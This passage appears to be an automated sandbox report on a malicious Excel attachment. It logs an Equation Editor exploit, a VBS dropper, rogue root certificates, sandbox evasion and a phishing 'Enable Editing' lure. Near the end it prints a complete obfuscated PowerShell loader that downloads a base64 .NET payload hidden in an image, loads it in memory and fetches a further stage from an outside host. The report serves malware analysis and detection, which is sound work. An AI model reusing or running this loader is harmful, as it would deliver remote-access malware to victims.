$pshoMe[4]+$psHome[34]+'X')"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 12_2_00214C5C push cs; ret

12_2_00214C62

Persistence and Installation Behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\hop.fyi\DavWWWRoot			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\hop.fyi\DavWWWRoot			Jump to behavior

Source: Office document

LLM: Score: 8 Reasons: The screenshot contains a visually prominent button labeled 'Enable Editing' which is highlighted in yellow. The text in the screenshot creates a sense of urgency by stating 'contenido bloqueado, habilite la edicin para ver el documento' and 'Content Locked. Please enable Editing and Content from the Yellow bar above to view locked content.' This type of message is commonly used in phishing attempts to trick users into enabling macros or other potentially harmful features. There is no clear impersonation of well-known brands, but the format and language used are typical of phishing attempts. The sense of urgency is directly connected to the prominent button, increasing the risk of the user being misled into enabling potentially harmful content.

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File dump: uh.uh.uhuhuh.uu.uh[1].doc.0.dr			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File dump: 4924813.doc.3.dr			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Section loaded: netapi32.dll and davhlpr.dll loaded

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 9_2_035B05A1 URLDownloadToFileW,ShellExecuteW,ExitProcess,

9_2_035B05A1

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Source: Ship particulars.xls	Stream path 'MBD0026D144/Package' entropy: 7.9786395883 (max. 8.0)
Source: Ship particulars.xls	Stream path 'Workbook' entropy: 7.99706828447 (max. 8.0)
Source: ~DFA3F86C325C272D08.TMP.0.dr	Stream path 'Package' entropy: 7.9702834436 (max. 8.0)
Source: 92530000.0.dr	Stream path 'MBD0026D144/Package' entropy: 7.9702834436 (max. 8.0)
Source: 92530000.0.dr	Stream path 'Workbook' entropy: 7.99840003622 (max. 8.0)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 995			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2276			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3296	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 3392	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3560	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3564	Thread sleep time: -1844674407370954s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3496	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 9_2_035B05F4 mov edx, dword ptr fs:[00000030h]

9_2_035B05F4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 91.92.254.29 80

Jump to behavior

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 3440, type: MEMORYSTR

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS"			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')"			Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "('sevlink = 8zkhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358zk; sevwebclient = new-object system.net.webclient; try { sevdownloadeddata = sevwebclient.downloaddata(sevlink) } catch { write-host 8zkfailed to download data from sev'+'link'+'8zk -foregroundcolor red; exit }; i'+'f'+' (sevdownloadeddata -ne sevnull) { sevimagetext = [system.text.encoding'+']::utf8.getstring(sevdownloadeddata); sevstartflag = 8zk<<base64_start>>8zk; sevendflag = 8zk<<base64_end>>8zk; sevstartindex = sevimagetext.indexof(sevstartflag); sevendindex = sevimagetext.indexof(sevendflag); if (sevstartindex -ge 0 -and sevendi'+'ndex -gt sevsta'+'rtindex) { sevs'+'tar'+'tindex += sevstartflag.length; sev'+'ba'+'se64l'+'ength = sevendinde'+'x - sevstartindex; sevba'+'se64command = sevimagetext.substring(sevstartindex, sevbase64length); sevcommandbytes = [system.convert]::frombase64string(sevbase64command); sevloadedassembly = [system.reflection.a'+'ssembly]::load(sevcommandbytes); sevtyp'+'e = sevloadedassembly.gettyp'+'e(8zkrunpe.home8zk); sevmethod = sevtype.ge'+'tmethod(8zkvai8zk).invoke(sevnull, [object[]] '+'(8zktxt.sero/44133/931.871.64.891//:ptth8zk , 8zkd'+'esativado8zk , 8zkdesativado8zk , 8zk'+'desativado8zk,8zkregasm8zk,8zk8zk)) } }').replace('8zk',[string][char]39).replace(([char]83+[char]101+[char]86),[string][char]36)| &( $pshome[4]+$pshome[34]+'x')"
